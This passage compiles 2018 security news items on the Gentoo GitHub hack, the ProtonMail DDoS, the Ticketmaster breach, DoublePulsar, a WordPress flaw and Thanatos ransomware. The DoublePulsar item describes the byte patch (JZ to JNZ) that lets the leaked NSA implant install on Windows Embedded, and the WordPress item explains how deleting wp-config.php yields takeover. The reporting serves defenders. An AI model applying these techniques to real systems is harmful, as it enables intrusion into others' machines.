“Whilst the malicious code shouldn’t work as is and GitHub has now removed the organization, please don’t use any ebuild from the GitHub mirror ontained before 28/06/2018, 18:00 GMT until new warning.”

What is an ebuils?

“An ebuild file is a text file, used by Gentoo package managers, which identifies a specific software package and how the Gentoo package manager should handle it. It uses a bash-like syntax style and is standardized through the EAPI version.” reported Gentoo.

“Gentoo Linux uses ebuilds as the package management format for individual software titles. These ebuilds contain metadata about the software (the name and version of the software, which license the software uses, and the home page), dependency information (both build-time as well as run-time dependencies), and instructions on how to deal with the software (configure, build, install, test …).”


According to Gentoo, the code hosted on its own infrastructure is not impacted. The Gentoo repository mirrors are hosted in a separate GitHub account that were not affected by the security breach.

Gentoo users have been informed not to utilize any ebuilds downloaded from the compromised GitHub account prior to 18:00 GMT on June 28, 2018.

As part of the incident response, GitHub has suspended the hacked account, users can verify the signature of the commits to stay secure.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.


Apophis Squad hacker group is the alleged responsible for the DDoS attack against ProtonMail
29.6.2018 securityaffairs Attack

A massive DDoS attack hit encrypted email provider ProtonMail, experts believe it was powered by Russian hackers.
On Wednesday morning, ProtonMail informed customers that its systems were under attack that was causing a delay in the delivery of the messages.

ProtonMail

@ProtonMail
Our network is under attack again. No data is breached or lost, but emails will be delayed. We are working with our upstream providers to halt the attack as soon as possible. Here are the details of yesterday's attack: https://old.reddit.com/r/ProtonMail/comments/8u6k0k/protonmail_hard_down_right_now/e1ddek7/ … Thank you for your understanding.

ProtonMail

@ProtonMail
We had an incident with the network earlier today. Service has been restored and no emails were lost. https://twitter.com/ProtonMail/status/1011858507879145473 …

10:03 AM - Jun 28, 2018
478
312 people are talking about this
Twitter Ads info and privacy
Anyway, the company highlighted that the emails systems did not suffer further problems, such as the data leak.

Some users faced problems while using the ProtonVPN service.

The experts sustained that the attack was prolonged and the operations were restored roughly three hours after the announcement.

“The attacks went on for several hours, although the outages were far more brief, usually several minutes at a time with the longest outage on the order of 10 minutes,” reported ProtonMail.

DDoS attacks are ordinary problems for ProtonMail, but according to the company, this attack was exceptional.

DDoS protection service Radware took more time to completely repel the DDoS that according to ProtonMail peaked at 500 Gbps. Another detail shared by Radware is that the massive DDoS leveraged multiple vectors, including several UDP refection attacks, multiple TCP bursts, and Syn floods.

“The attacks went on for several hours, although the outages were far more brief, usually several minutes at a time with the longest outage on the order of 10 minutes.”ProtonMail explained on Reddit.

“While we don’t yet have our own measurement of the attack size, we have traced the attack back to a group that claims to have ties to Russia, and the attack is said to have been 500 Gbps, which would be among the largest DDoS’s on record,”

While some of the experts blamed Russia for the attack, Radware reported that the attack was launched by systems located in the UK.

According to Bleeping Computer, behind the attack, there is a hacker group named Apophis Squad.

“In a private conversation with Bleeping Computer today, one of the group’s members detailed yesterday’s chain of events.” read a blog post published by Bleeping Computer.

“The Apophis member says they targeted ProtonMail at random while testing a beta version of a DDoS booter service the group is developing and preparing to launch.”

The leader of the group told Bleeping Computer that their first attack downed the encrypted email provider for 60 seconds,

Initially, the Apophis Squad was not interested in harass ProtonMail, but decided to prolong the attack after ProtonMail’s CTO, Bart Butler, responded to one of their tweets calling the group “clowns.”

ProtonMail Squad ProtonMail DDoS

Today the group continued to target ProtonMail with another DDoS attack consisting of a TCP-SYN flood that peaked at 70 Gbps.

ProtonMail wasn’t the only target of the hackers, they also targeted Tutanota for a short time.

Tutanota
@TutanotaTeam
We are experiencing a DDoS attack and are currently working on mitigating this. Thank you for your patience.

12:37 AM - Jun 28, 2018
65
46 people are talking about this
Twitter Ads info and privacy
The Apophis Squad group is currently developing a DDoS booter service that they advertised in the last days on Twitter and on Discord. Their service promises multi-vectors attacks leveraging NTP, DNS, SSDP, Memcached, LDAP, HTTP, CloudFlare bypass, VSE, ARME, Torshammer, and XML-RPC.

The group is based in Russia, but in a private conversation with BleepingComputer, the group said that it isn’t so.


Ticketmaster suffered a data breach and blamed a third-party provider over the incident
29.6.2018 securityaffairs Incindent

The entertainment ticketing service Ticketmaster announced it has suffered a data breach that exposed personal and payment customer information.
Hackers accessed name, address, email address, telephone number, payment details and Ticketmaster login details of company customers.

According to the company, attackers installed a malicious code on customer support product hosted by Inbenta Technologies, an external third-party. Hackers compromised a third-party support customer service chat application deployed on the UK website to steal personal and payment information from customers that purchased tickets.

At the time, there is no information about the extent of the incident, experts believe that the incident may have affected tens of thousands of its customers.

“On Saturday, June 23, 2018, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.” reads the data breach notification published by Ticketmaster.

“As soon as we discovered the malicious software, we disabled the Inbenta product across all Ticketmaster websites. Less than 5% of our global customer base has been affected by this incident. Customers in North America have not been affected.”

Ticketmaster

The ticketing service disabled the Inbenta support customer service chat application from all of its websites.

Inbenta Technologies denied any responsibility and blamed Ticketmaster for have installed its chat application improperly. The company explained that hackers have exploited a single piece of JavaScript code specifically customized for ticketing service company that installed it directly a without notifying Inbenta team.

“Upon further investigation by both parties, it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster’s particular requirements. This code is not part of any of Inbenta’s products or present in any of our other implementations.” reads a statement published by Inbenta.

“Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability. The attacker(s) located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.”

The ticketing service has launched an investigation to determine the responsibility for the incident and is working with authorities, as well as financial institutions to limit the extent of the incident.


Threat Detection Firm Cynet Raises $13 Million
28.6.2018 securityweek IT

Threat detection and response company Cynet on Wednesday announced that it raised $13 million in a Series B funding round, which brings the total raised to date to $20 million.

The funding round was led by Norwest Venture Partners, with participation from Shlomo Kramer and Ibex Investors. The firm previously raised $7 million in a Series A funding round in 2016.

Cynet says it will use the new funds to continue its growth and keep fueling the development of its products.Cynet secures $13 million investment

The company’s Cynet 360 platform, which is said to be used by organizations worldwide to protect millions of endpoints, is designed to prevent, detect and remediate any threat on the internal network, including malware, zero-day attacks, ransomware, lateral movement, and malicious insiders.

Cynet says its solution can be deployed in less than two hours and it provides security teams complete visibility into traffic and communications across tens of thousands of endpoints.

“Almost all cybersecurity solutions are built to address one vertical in the complex enterprise defense architecture,” said Dror Nahumi, general partner at Norwest Venture Partners. “However, small to medium size enterprises do not have the resources to define, select, integrate and manage dozens of products from different vendors. We are impressed with Cynet’s vision and proven customer success to enable a complete defense solution from a single platform, addressing this huge market demand.”


Significant DDoS Attack on ProtonMail Blamed on Russia-Linked Group
28.6.2018 securityweek Attack

Encrypted email provider ProtonMail was hit by a significant distributed denial-of-service (DDoS) attack that appears to have been carried out by a group linked to Russia.

ProtonMail informed customers on Wednesday morning that its network was targeted in a sustained attack. The organization said that while emails would be delayed, they were not lost as a result of the incident. Some users reported that the attack impacted the ProtonVPN VPN service as well.

ProtonMail hit by Ddos attack

Services were restored roughly three hours after the initial announcement was made.

“The attacks went on for several hours, although the outages were far more brief, usually several minutes at a time with the longest outage on the order of 10 minutes,” ProtonMail stated.

The company says it deals with DDoS attacks on a daily basis, but this attack was more significant and its DDoS protection provider, Radware, needed more time than usual to prepare mitigations.

“While we don't yet have our own measurement of the attack size, we have traced the attack back to a group that claims to have ties to Russia, and the attack is said to have been 500 Gbps, which would be among the largest DDoS's on record,” ProtonMail said in a post on Reddit.

The DDoS attack on ProtonMail may have been significant, but it does not compare to a recent attack that hit an unnamed U.S.-based service provider, which peaked at 1.7 Tbps.

A few hours after ProtonMail announced the attack, Germany-based secure email service provider Tutanota also informed users that it had been experiencing a DDoS attack, but it’s unclear if the incidents are related. Tutanota told customers that services had been restored roughly one hour later.

UPDATE. Radware told SecurityWeek that it believes the attackers are actually based in the UK, not Russia.

"We can’t confirm attack size as it varied at different points in the attack. However we can confirm that the attack was high volumetric, multi-vector attack. It included several UDP refection attacks, multiple TCP bursts, and Syn floods," Radware said.


Identity-based Threat Detection Preempt Raises $17.5 Million
28.6.2018 securityweek IT

San Francisco, Calif (HQ) and Ramat Gan, Israel (R&D) threat prevention firm Preempt has raised $17.5 million in a Series B funding round supported by ClearSky, Blackstone, Intel Capital and General Catalyst. The total raised by Preempt now stands at $27.5 million, having raised $2 million as seed funding in 2014, and $8 million in a Series A round in 2016.

Preempt was founded in 2014 by Ajit Sancheti, and Roman Blachman. It is another innovative cybersecurity firm with roots into the Israeli Defense Forces, where Blachman spent almost ten years -- with four as a research and development manager.

Preempt focuses on providing security by preventing malicious transactions. It does this by identity, behavior, risk and context at the point of the transaction rather than just the point of log-in. It allows, says the company, for control over who can access what resources and in what context without network segmentation or application development.

"Our mission," explains Preempt CEO and co-founder Ajit Sancheti, "is to provide a more holistic approach around securing and protecting identity within the enterprise and to make it easier for enterprises to preempt threats before they impact the business."

In a blog published Wednesday (June 27), ClearSky's operating partner and CISO, Patrick Heim wrote, "We believe that Preempt's approach -- identity as the new perimeter, identity as a cybersecurity problem-solver -- is the future."

The idea of identity being the true perimeter is a growing concept. It is no longer the firewall nor even the endpoint that should be considered the security perimeter -- it is each individual human. Earlier this month, Tessian co-founder and CTO Ed Bishop told SecurityWeek, "Our belief is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization."

While Tessian concentrates on email security, Preempt concentrates on real-time network threat prevention -- but both do so based on user identity and behavior.

Preempt further allows tool and protocol containment. The misuse of network tools can be controlled, and the use of hacking tools prevented. It can deeply inspect authentication protocols such as Kerberos, NTLM, RPC and LDAP, and detect known issues such as pass-the-hash.

At the same time, all user activity can be viewed in one place, including access, behavior, history, profile, changes, locations, device, role, password strength, privileges, VPN, SSO, and more.

ClearSky's Patrick Heim is joining Preempt's board of directors. "It was exciting to see Preempt take a radical new approach to solving vulnerabilities that lie at the core of virtually all enterprises and are commonly leveraged by attackers in major breaches," he said; while adding in his blog, "It's rare that [I] get truly excited about a new security technology."

Preempt already counts Fortune 500 enterprises among its customers. The new funding is intended to help the company expand operations to accelerate product innovation and its go-to-market strategy.


SSDP Diffraction Abused for DDoS Amplification
28.6.2018 securityweek Attack

The Simple Service Discovery Protocol (SSDP) can be abused to launch a new type of distributed denial of service (DDoS) attacks where devices respond with a non-standard port, NETSCOUT Arbor reports.

The technique, referred to as SSDP diffraction, results in UDP packets with ephemeral source and destination ports. This makes mitigation more difficult, as packet content would require inspection to filter the flood of SSDP replies and non-initial fragments.

The issue, NETSCOUT Arbor says, is that a large number of CPE (customer-provided equipment) devices use the open source library libupnp. What’s more, attackers appear aware of said behavior and “may choose a pool of these misbehaving victims based on the efficacy of their attack.”

Most of the roughly 5 million SSDP servers reachable via the Internet would respond from an ephemeral source port and, with SSDP diffraction attacks using such ephemeral ports able to defeat naïve port filtering mitigations, DDoS protection faces a problem, the researchers suggest in a report (PDF).

SSDP, which was designed for service discovery over a local network, uses text-based HTTP messages over UDP (also known as HTTPU) on port 1900. It would respond to both packets with multicast addresses as source or destination (which only work on local network) and with unicast addresses (which are routed via the Internet).

SSDP-based reflection/amplification attacks became popular several years ago, but mitigation is straightforward, as the attack packets originate from a specific source port and contain an HTTPU response, while also having an ephemeral destination port from the original spoofed request.

“Almost all uses of SSDP occur on the local network, and most large organizations don’t rely on the protocol for mission-critical applications, so packets with a UDP/1900 source port can generally be filtered at network boundaries during a crisis,” NETSCOUT Arbor explains.

However, the DDoS protection firm also observed attacks able to bypass mitigations by leveraging SSDP diffraction: they would use high-numbered ports as the source and destination instead of relying solely on UDP/1900 source port HTTPU packets.

“Clearly either the attacker, or the author of the attack tool, was aware of the difference in efficacy of both the normal attack and the diffraction attack,” the researchers say.

After scanning the Internet for SSDP devices, the researchers discovered that over half of them would respond with UDP packets with a source port other than 1900.

China emerged as the country with most responding devices, both behaving (responding with a source port of 1900) and misbehaving (responding with other source ports). Russia, Vietnam, South Korea, and Venezuela are also top sources of misbehaving devices.

Further investigation revealed that libupnp (Portable SDK for UPnP Devices) might be responsible for the bad behavior: not only does it create “a new socket for responses, resulting in a new ephemeral port,” but also uses by default the unique Server HTTPU header and the X-User-Agent: redsonic HTTPU header, both of which appear representative for the misbehaving set of devices.

“Attacks will always incrementally evolve just enough evade defenses. In this case we identified an effective new twist on an old, well-understood attack type. This revelation reminds us that defenders must constantly be aware of evolving attack methods and be as adaptable as the attackers. This specific attack highlights two trends we see time again: old code containing bugs being re-used in new consumer products, and subsequent exposure of those vulnerable populations,” NETSCOUT Arbor concludes.


BitSight Raises $60 Million in Series D Funding Round
28.6.2018 securityweek IT

Security ratings firm BitSight today announced that it has closed a $60 million Series D funding round that brings the company’s total funding to $155 million.

Founded in 2011, BitSight's Security Ratings SaaS platform is currently used by more than 1,200 customers around the world to manage third party risk, benchmark performance, underwrite cyber insurance policies and conduct M&A due diligence.

BitSight plans to use the funding to continue its global expansion and extend its portfolio of security risk management solutions.

BitSight Logo

According to BitSight, demand for its product is increasing rapidly. In fact, cyber-security ratings are expected to become “as important as credit ratings when assessing the risk of business relationships” within the next four years, the company notes, citing a Gartner report.

Cybersecurity rating services are also expected to impact the degree to which organizations engage with other companies and should also influence the cost and availability of cyberinsurance.

“When BitSight introduced the first Security Ratings Platform in 2011, we set out to transform how businesses evaluate risk and security performance. […] there is still more work to do in continuing to establish a global standard for cyber security risk decisions,” said Tom Turner, CEO of BitSight.

“We believe there is tremendous opportunity for BitSight globally, and we look forward to working with Tom and the rest of the talented management team in the company’s next phase of growth,” Davis said.

Led by Warburg Pincus, BitSight’s new funding round received participation from existing investors Menlo Ventures, GGV Capital and Singtel Innov8. Cary Davis, Managing Director of Warburg Pincus, will join BitSight's Board of Directors.


Ops … the DoublePulsar NSA-Linked implant now works also on Windows Embedded devices
28.6.2018 securityaffairs BigBrothers

This is a very bad news for security community, the NSA-linked DoublePulsar exploit can now target Windows Embedded devices.
The DoublePulsar exploit was released publicly in April 2017 by ShadowBrockers hackers that allegedly stole them from the NSA.

The hackers leaked a huge trove of hacking tools and exploit codes used by the US intelligence agency, most of Windows exploits were addressed by Microsoft the month before.

DoublePulsar is sophisticated SMB backdoor that could allow attackers to control the infected systems since its leak it was working on almost any Windows system except on devices running a Windows Embedded operating system.

News of the day is that a security researcher who uses the online with the moniker of Capt. Meelo has developed a version of the DoublePulsar exploit code that also works on devices running a Windows Embedded operating system.

The experts discovered that even if the devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and discovered that the target device was indeed vulnerable via the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for Windows Embedded version. ” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

Summarizing the expert was able to exploit the EternalBlue attack against the target device but the deployment of the DoublePulsar backdoor was failing , so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used the @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to patch the modified exe file. and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload to the target host.


France Also Interested in Greece's Russian Bitcoin Suspect
28.6.2018 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 2018.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.


Unpatched WordPress Flaw Leads to Site Takeover, Code Execution
28.6.2018 securityweek
Vulnerebility

A file deletion vulnerability that remains unpatched 7 months after being reported allows for the complete takeover of WordPress sites and for arbitrary code execution.

The security flaw supposedly impacts all WordPress versions, including the latest 4.9.6 iteration. An attacker looking to exploit the issue would first have to gain privileges to edit and delete media files.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,” RIPS Technologies’ Karim El Ouerghemmi explains.

An attacker targeting the vulnerability can delete any file of the WordPress installation, as well as any file on the server the PHP process user has permissions to delete files from. An attacker could erase an entire WordPress installation and could also circumvent security measures to execute arbitrary code on the server.

Files that can be deleted include .htaccess (which may contain security related constraints), index.php files (granting an attacker a listing of all files in the WordPress directories), and wp-config.php (which contains the database credentials).

Deleting wp-config.php triggers the WordPress installation process on the next visit to the website, which allows the attacker to undergo the installation process and use admin credentials of their choice, thus being able to execute arbitrary code on the server.

The security researcher reported the vulnerability to WordPress in November last year, via HackerOne. The WordPress security team triaged and verified the issue soon after receiving the report, but no patch has been released to date, although they apparently estimated in January that a fix would become available within six months.

A hotfix available from RIPS Technologies can be integrated by site admins into existing WordPress installations by adding it to the functions.php file of the active theme. By making sure that the data provided for the meta-value thumb does not contain code that would make path traversal possible, the hotfix prevents security-relevant files from being deleted.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies notes.

Because it requires a user account, the vulnerability cannot be abused for the exploitation of arbitrary WordPress sites at scale. However, websites that share multiple user accounts should apply a hotfix, El Ouerghemmi points out.


Ping Identity Acquires API Security Firm Elastic Beam
28.6.2018 securityweek IT

Identity management solutions provider Ping Identity on Tuesday announced the acquisition of Elastic Beam, a company that specializes in detecting and blocking attacks aimed at application programming interfaces (APIs).

Ping Identity has been around since 2002 and it has raised more than $128 million. It previously acquired two other companies, UnboundID in 2016 and Accells Technologies in 2014.

The Ping Identity Platform allows enterprise users to securely access mobile, cloud and on-premises applications, while providing developers the possibility to enhance their apps with access management, single sign-on, multi-factor authentication, and data governance capabilities.

Elastic Beam emerged from stealth mode last year with a hybrid cloud software product that uses artificial intelligence (AI) to detect and neutralize threats that leverage APIs, including data exfiltration, unauthorized changes or removal of data, distributed denial-of-service (DDoS) attacks, code injections, brute force attempts and authentication via stolen credentials, API memory attacks, and WebSocket attacks.

Along with the acquisition of Elastic Beam, Ping Identity announced the launch of a new AI-driven solution designed for securing APIs.

The new product, named PingIntelligence for APIs, is currently in private preview and is expected to become generally available in the second half of 2018.

According to the company, PingIntelligence for APIs is designed to provide organizations deep visibility into how APIs are used or misused, and it delivers extensive information that can be useful for audit, compliance, and forensic reports.

“PingIntelligence for APIs applies AI models to continuously inspect and report on all API activity. It automatically discovers anomalous API traffic behavior across the enterprise. Bad actors are well versed in circumventing static security policies, so PingIntelligence for APIs was purpose-built to recognize and respond to attacks which fly under the radar of foundational API security measures, and target API vulnerabilities—without policies, rules or code,” Ping Identity described the product on its website.


Fastbooking Hack Leaves Japan Hotel Red-Faced
28.6.2018 securityweek Incindent

A Japanese hotel chain has apologised after more than 120,000 items of customer information were stolen in hacks of its reservations handled by French company Fastbooking.

Prince Hotel, a major Japanese hotel operator, said the breach occurred when hackers attacked Paris-based Fastbooking, which manages its foreign-language bookings.

A Fastbooking spokeswoman confirmed that the company had been hacked on June 14 and had not detected the attack until June 19.

"All of our markets have been affected but this represents a minority of our customers," she said.

She declining to say how many hotels were affected, but said Japanese data made up a large proportion of the hacked information.

Fastbooking, a subsidy of French multinational AccorHotels, handles reservations for some 4,000 hotels in 40 countries.

Prince Hotel said the server for its English, Chinese and Korean-language websites was hacked twice earlier this month and a total of 124,963 items of information such as names, credit card numbers and addresses were stolen.

"There was unauthorised access to the servers of Fastbooking in France," the hotel said in a statement.

The hotel said names, home addresses, phone numbers and other personal information of customers who had booked rooms between May and June 2017 were taken, and that credit card numbers were stolen from customers who had made reservations before August 2017.​

Prince Hotel president Masahiko Koyama apologised and bowed deeply at a press conference on Tuesday.

"We're deeply sorry for causing great concern and trouble," he said.

The hotel chain said it was suspending its websites until it could ensure their security.


UK Publishes Minimum Cyber Security Standard for Government Departments
28.6.2018 securityweek Cyber

The UK government's Cabinet Office has published the first iteration of its Minimum Cyber Security Standard, which will be incorporated into the Government Functional Standard for Security. The standard is mandatory for all government departments (which includes 'organizations, agencies, Arm’s Length Bodies and contractors'); but provides an excellent security checklist/framework for all commercial organizations.

It is a surprisingly short document (PDF); just seven pages comprising 10 sections under five categories: Identify, Protect, Detect, Respond and Recover. It largely follows the wider European approach of mandating outcomes rather than specific means to achieve those outcomes -- but is not entirely devoid of specific instructions.

For example, Section 6_d _iv includes, "You shall register for and use the NCSC's Web Check service." Web Check is part of the NCSC's Active Defense program. It is designed to check public sector websites for common vulnerabilities, and by this time last year was quietly scanning more than 1,200 government sites every day.

Other requirements include support for TLS v1.2, and the implementation of Domain-based Message Authentication Reporting and Conformance (DMARC) "to make email spoofing difficult".

Another requirement (6_d_i) is that departments must, "Ensure the web application is not susceptible to common security vulnerabilities, such as described in the top ten Open Web Application Security Project (OWASP) vulnerabilities." How that is ensured, like all requirements, is not specified.

For example, MFA is required (where feasible), but no specific factors or methods are described (7_b). It therefor allows for, but does not mention, evolving behavioral biometric factors.

This is by design. The document itself says, "As far as possible the security standards define outcomes, allowing Departments flexibility in how the standards are implemented, dependent on their local context."

This lack of detailed prescription is welcomed by Sanjay Kalra, co-founder and chief product officer at Lacework. "This is especially important for organizations that operate workloads in the cloud," he told SecurityWeek. "Where change is rapid and continuous; the appropriate cloud security measures require flexibility in their approach. In some ways, the Standard is similar in structure to GDPR, where the emphasis is on the outcome, but the guidelines for implementation allow for a common-sense approach that is flexible enough to allow for what works best for the organization.”

The publication is largely well-received by the security industry. Ilia Kolochenko, CEO of High-Tech Bridge (which offers its own web scanning service for both public and private industry), told SecurityWeek, "Simplicity and efficiency are successfully combined in the document. Today, many governmental entities don’t even know where and how to start cybersecurity, and this document will certainly help them structure and manage their digital risks and implement proper cybersecurity processes."

It’s also exciting to see, he added, "some simple, but clear and effective, technical requirements such as proper TLS encryption and obligatory testing of web applications for OWASP Top 10."

Matt Lock, director of sales engineers at Varonis, fears its simplicity is deceptive. "The minimum standards may sound simple on paper," he told SecurityWeek, "but even large organizations may struggle putting these steps into practice." Joseph Carson, Chief Security Scientist at Thycotic, adds, "As always, the questions for all of these standards will depend on the ability to enforce them.”

Carson also notes that securing the supply chain includes insistence that suppliers meet the UK Cyber Essentials level 6. H is somewhat concerned that the whole process could be "an indication that as the UK government prepares for the imminent Brexit, it is taking its own direction when it comes to cybersecurity. However, past incidents reveal that a cybersecurity strategy that does not extend beyond the country’s borders is doomed for failure as it assumes all cybercrime only occurs from within."

Matt Walmsley, EMEA director at Vectra, notes the document is focused on the detection of known and common threats and attacks. "The really advanced attackers are well-resourced and highly motivated. They will use previously unseen innovative attacks that use both legitimate tools and zero-day vulnerabilities and exploits which will bypass traditional signature-based defense and detection approaches."

By definition, he suspects that government departments will be targets for advanced attackers. "Given the UK government departments are likely targets for cyber-espionage, and politically motivated hacktivists as well as broader cyber-attacks, it is vital that they have the ability to detect and respond to advanced hidden attackers in short order, and with high efficacy.”

Mark Adams, regional VP, UK&I at Veeam Software, believes it is a great start for government, but government needs to do more to sell the standard across private industry. "What hope does a minimum cyber security standard have of being adhered to, outside of the government departments where it is made mandatory? Precious little, unfortunately... more must be done by the UK government to educate the private sector and make it realize that data protection and more secure data management is a necessity."

U.S. security experts have been quick to see the parallels between the UK standard and NIST's Cybersecurity Framework. “If you look at the HMG Security Policy Framework (SPF), referenced by the Minimum Cyber Security Standard," Anupam Sahai, VP product management at Santa Clara, Calif-based Cavirin told SecurityWeek, "you’ll see that the overall structure is almost identical to the US NIST CSF -- and for good reason. The five primary functions – Identify, Protect, Detect, Respond, and Recover – are universal. Where the HMG SPF needs to go next is to map the high-level guidance to the more detailed UK-specific references, as they are mapped in the CSF. In parallel," he adds the UK has launched an Active Cyber Defense program, which in fact could serve as a template for the US.”

Lock also makes a comparison with the NIST framework. "The NIST Framework emphasizes the protection of data, provisioning access to a least-privilege “eyes-only” model, and continuous improvement among other key areas. And like the U.S. model, the Standard calls for continuous improvement, as organizations must be ready for the next attack.”

All told, the general consensus is favorable. The Minimum Security Standard is mandated for government, but also provides a valuable framework of private industry -- paralleling NIST in the U.S. Kolochenko sees even further value. "The UK," he said, "serves a laudable example on how cybersecurity can be and should be managed on a governmental level, that many other European countries can follow.”


Free Thanatos Ransomware Decryptor Released
28.6.2018 securityweek
Ransomware

Cisco’s Talos team this week announced the availability of a free decryption tool to help victims of the Thanatos ransomware recover their files without paying the ransom.

Analysis of the threat has revealed a large number of Thanatos iterations being used by attackers, which led Talos to the conclusion that the malware is being actively developed. Unlike other ransomware families, which use Bitcoin, Thanatos asks victims to pay the ransom in the form of Bitcoin Cash (BCH), Zcash (ZEC), Ethereum (ETH) and others.

Cisco’s Talos researchers also discovered a series of issues with the malware’s encryption process, which prevents the attacker from successfully returning the data to the victim, even if the ransom was paid. “In some cases, this is intentional on the part of the distributor,” Talos reports.

Differences between the various versions of the malware are mainly observed in the ransom note, which was initially primitive, saved on the desktop as README.txt. It would only inform the victim that their files had been encrypted and demanded a payment be made to a specific Bitcoin address, the same for all victims. Apparently, payment processing was made manually and was email-based.

The next version already added support for more crypto-currencies the victims could pay the ransom with. In addition to offering support for BTC, ETH, and BCH, that malware variant also included a unique MachineID in the ransom note, and instructed victims to send it to the attacker (via email).

The investigation into the various Thanatos ransomware iterations also revealed that, at least in one particular case, the attacker “had no intention of providing any sort of data decryption to the victim,” the security researchers say. The malware was being distributed as attachments to chat messages sent via Discord.

The ransom note delivered to victims as part of that attack would inform them that decryption was not available, which clearly suggested the actor was not financially motivated, but rather interested in destroying data on the victim's system.

Once executed on the victim system, the malware copies itself into a subdirectory within %APPDATA%/Roaming. It also scans the following directories to identify files to encrypt: Desktop, Documents, Downloads, Favourites, Music, OneDrive, Pictures, and Videos.

The ransomware can encrypt all files in the target directories, and the security researchers observed it discarding the encryption key after encrypting users’ files (which now have the .THANATOS extension). Because of that, the attackers can’t provide access to the decrypted data, even if a ransom demand is paid.

The encryption keys used to encrypt files on victims' systems are derived from the number of milliseconds since the system last booted. Because these keys are 32 bits and can store up to 49.7 days' worth of milliseconds, which is much higher than the average amount of uptime on many systems, “this makes brute-forcing the key values significantly cheaper from a time perspective,” Talos says.

Furthermore, because the system uptime is written to the Windows Event Log roughly once per day, “the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection,” the researchers note. Thus, successfully recovering the encryption key would take roughly 14 minutes.

Talos’ newly released decryption utility works with versions 1 and 1.1 of the Thanatos ransomware and on all currently known Thanatos samples the security firm has observed. Victims are advised to execute the decryptor “on the original machine that was infected and against the original encrypted files that the malware created.”

At the moment, the utility can only decrypt .gif, .tif, .tiff, .jpg, .jpeg, .png, .mpg, .mpeg, .mp4, .avi, .wav, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf,.zip, .7z, .vmdk, .psd, and .lnk file types. To decrypt files, users need to download ThanatosDecryptor and execute the .exe file in the release directory.


Cyber-Espionage Campaigns Target Tibetan Community in India
28.6.2018 securityweek CyberSpy

Two cyberespionage campaigns targeting the Tibetan community based in India appear to be the work of Chinese threat actors, a new Recorded Future report reveals.

Referred to as RedAlpha, the campaigns have been ongoing for the past two years, focused on cyber-espionage. As part of these attacks, which share light reconnaissance and selective targeting, various malicious tools were used, including new malware families.

The newly uncovered campaigns took place in 2017 (involving a custom dropper and the NetHelp infostealer implant) and 2018 (when a custom validator and the njRAT commodity malware were used). The latter campaign is still ongoing.

While the second campaign leveraged a scaled-down infrastructure, likely to reduce the impact of discovery, both attacks used payloads configured with several command and control (C&C) servers, but the malware employed the doc.internetdocss[.]com C&C domain in both cases.

The security researchers also observed the attackers using a malicious Microsoft Word document that exploited CVE-2017-0199 and managed to connect the attacks to previous activity due to the use of FF-RAT and common infrastructure used by NetTraveler, Icefog, and DeputyDog APTs, as well as the MILE TEA campaign.

Over the years, the Tibetan and Uyghur communities have been targeted by many threat actors, including Chinese attackers such as the original Winnti group, LuckyCat, and NetTraveler, but also MiniDuke.

As part of the RedAlpha campaigns, the actor used a “careful combination of victim reconnaissance and fingerprinting, followed by selective targeting with multi-stage malware,” Recorded Future reports.

The first campaign started in June 2017 using two stages of largely custom malware for both 32- and 64-bit Windows systems: a straightforward dropper that would fetch a payload and establish persistence, and the NetHelp infostealer to collect system information, compress files and directories, and exfiltrate them. The attackers relied on a dual C&C infrastructure.

